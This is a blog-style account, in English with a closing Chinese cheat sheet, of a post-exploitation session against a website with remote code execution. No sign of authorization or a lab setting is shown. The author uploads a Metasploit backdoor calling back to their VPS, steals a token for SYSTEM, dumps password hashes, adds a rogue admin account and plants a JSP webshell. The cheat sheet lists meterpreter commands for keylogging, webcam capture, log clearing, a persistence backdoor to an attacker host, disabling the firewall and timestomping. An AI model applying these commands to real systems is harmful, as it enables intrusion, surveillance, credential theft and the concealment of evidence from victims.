Record an imprefect post penetration

 

Because some reason,i don't have a sceenshot.

All right,let's us start！

Background

 I found a website had a RCE,so i can execute any command in his server,but i didn't found his website root directory!

 

Recon&collect informations

 

first ,i run the "whoami" command,show administrator permissions,so i can judge that his OS is Windows,of course,you can also judge by other way.That's not the point.

And i run the "dir" command to view the files  in the current directory,at the same time , i can also know my current path,but it is  not website root directory.

So i can't upload my webshell in his website,i tried to upload some text,it is successed,then i run the "tasklist" command to check wether the server has anti-virus software,lucky,it haven't!,so i tried to upload my msf backdoor to this server,and execute it，everything is going well!,my vps get a session。That will be very convenient for my next opration.

Next,contibue to collect informations,

run "getuid",i found that i am not system,i tired to getsystem,but it is failed,what cna l do? first , i run the "ps" command to find some system process,then run the "steal_token pid" to injection process,so i get system!

and then i run the "run hashdump",to get user password,i got the encrypted passwords fo serveral users,and i found a hidden user,i tired to decrypt the users,but failed.

so i run the follow command to add a user and join the management group

 

net user test admin@admin /add

net localgroup administrators test /add

 

It is OK!

and i can use "sysinfo" and "ipocnfig" and "netstat -ano" to found more informations,that is more basic,so i didn't say much.

I tired to connect to remote  desktop , but failed.

So far, i know following information:

1.His OS is windows 2012 r2

2.He open 3389 port.

3.He has a intranet.

4.no AV.

etc.....-_-||,i forget.....

 

Permission maintenance

I try to upload a webshell  to the root directory of his website,but i don't know root directory.

when i view his website i found he has a special file that name is 1.txt

so i can run the "search -f 1.txt" command to find his root directoy,and succeed.

Then i upload my webshell use "upload /xx/xxx/shell.jsp /xx/xx/xx/",and succeed.

i use antsword to connect my webshell ,and succeed.

but then his server shut down,so my action over.

 

好吧，接下来的东西还是用中文来总结吧.

meterpreter常用的命令：

background->后台挂起。

cat->查看文件。

del->删除文件。

upload->上传文件。

download->下载文件。

edit->编辑文件。

search -f xxx->搜索文件。

enumdesktop->用户登录次数。

sysinfo->系统信息。

keyscan_start->开启键盘记录。

keyscan_Dump->显示捕获到的信息。

keyscan_stop->停止记录。

migrate+pid->进程迁移or绑定进程（可用于提权和持久化）

steal_token+pid->令牌窃取（提权）。

clearev->日志清楚。

webcam_snap -i 1 -v false->摄像头画面捕获。

run hashdump->获取密码哈希值。

run keylogrecorder->键盘记录。

run  persistence -X -i  5  -p 4444 -r vps_ip->持续后门，开机自启，每5s保持会话。

run  getgui  -e ->开启远程桌面。

netsh adcfirewall set allprofiles state off->关闭防火墙

timestomp -v test.txt->查看目标文件MACE时间。

timestomp text.txt -c "11/11/2021 10:22:14"->修改创建文件的的时间（反溯源）。

 

Well,that is it! Next time i  wil  talk about intranet penetration!